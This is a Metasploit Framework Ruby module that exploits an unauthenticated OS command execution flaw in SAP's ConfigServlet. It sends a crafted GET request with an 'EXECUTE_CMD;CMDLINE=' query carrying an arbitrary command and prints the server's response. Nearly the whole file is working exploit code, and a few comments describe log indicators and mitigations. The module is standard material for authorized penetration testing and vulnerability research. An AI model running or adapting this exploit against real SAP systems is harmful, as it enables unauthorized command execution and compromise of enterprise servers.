rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/admin/sap/sap_configservlet_exec_noauth.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Auxiliary module that sends a single unauthenticated GET request to the SAP
# ConfigServlet asking it to run an operating-system command, then reports
# whether the response body contains the marker 'Process created'.
#
# NOTE(review): the command is carried in the query string of a GET request.
# Consistent with the IOC_IN_LOGS side effect declared below, the fixed
# `param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=` prefix on the
# ConfigServlet path is presumably what shows up in HTTP access and proxy
# logs -- confirm against the target's logging configuration. Restricting
# network access to the servlet path and applying the vendor fix are the
# mitigations to verify on an affected system.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  # Registers the module metadata and its three options.
  #
  # RPORT defaults to 50000, CMD (the command sent to the servlet) defaults
  # to 'whoami', and TARGETURI (the directory that holds ConfigServlet)
  # defaults to '/ctc/servlet'.
  def initialize(info = {})
    module_info = update_info(
      info,
      'Name' => 'SAP ConfigServlet OS Command Execution',
      'Description' => %q{
        This module allows execution of operating system commands through the SAP
        ConfigServlet without any authentication.
      },
      'Author' => [
        'Dmitry Chastuhin', # Vulnerability discovery (based on the reference presentation)
        'Andras Kabai' # Metasploit module
      ],
      'License' => MSF_LICENSE,
      'References' => [
        [ 'OSVDB', '92704' ],
        [ 'EDB', '24963' ],
        [ 'URL', 'http://erpscan.com/wp-content/uploads/2012/11/Breaking-SAP-Portal-HackerHalted-2012.pdf']
      ],
      'DisclosureDate' => '2012-11-01', # Based on the reference presentation
      'Notes' => {
        'Stability' => [CRASH_SAFE],
        # The request, command included, is expected to be recorded by the target.
        'SideEffects' => [IOC_IN_LOGS],
        'Reliability' => []
      }
    )
    super(module_info)

    module_options = [
      Opt::RPORT(50000),
      OptString.new('CMD', [ true, 'The command to execute', 'whoami']),
      OptString.new('TARGETURI', [ true, 'Path to ConfigServlet', '/ctc/servlet'])
    ]
    register_options(module_options)
  end

  # Sends the request and prints the outcome.
  #
  # A connection error, a missing response, or a status other than 200 is
  # reported and ends the run. Otherwise success is decided only by the
  # presence of 'Process created' in the body; the "Output" line prints the
  # whole HTTP response body, not a parsed command result.
  def run
    target_label = "#{rhost}:#{rport}"
    command = datastore['CMD']

    begin
      print_status("#{target_label} - Sending remote command: " + command)

      request_opts = {
        'uri' => normalize_uri(target_uri.path, 'ConfigServlet'),
        'method' => 'GET',
        # The command is URI-encoded and appended to a fixed parameter prefix.
        'query' => 'param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=' + Rex::Text.uri_encode(command)
      }
      response = send_request_cgi(request_opts)
    rescue ::Rex::ConnectionError
      print_error("#{target_label} - Failed to connect to the server")
      return
    end

    # No response at all and a non-200 status are reported the same way.
    unless response && response.code == 200
      print_error("#{target_label} - Exploit failed")
      return
    end

    body = response.body
    if body.include?('Process created')
      print_good("#{target_label} - Exploited successfully\n")
      print_line("#{target_label} - Command: #{command}\n")
      print_line("#{target_label} - Output: #{body}")
    else
      print_error("#{target_label} - Exploit failed")
      # The body is shown only in verbose mode when the marker is absent.
      vprint_error("#{target_label} - Output: #{body}")
    end
  end
end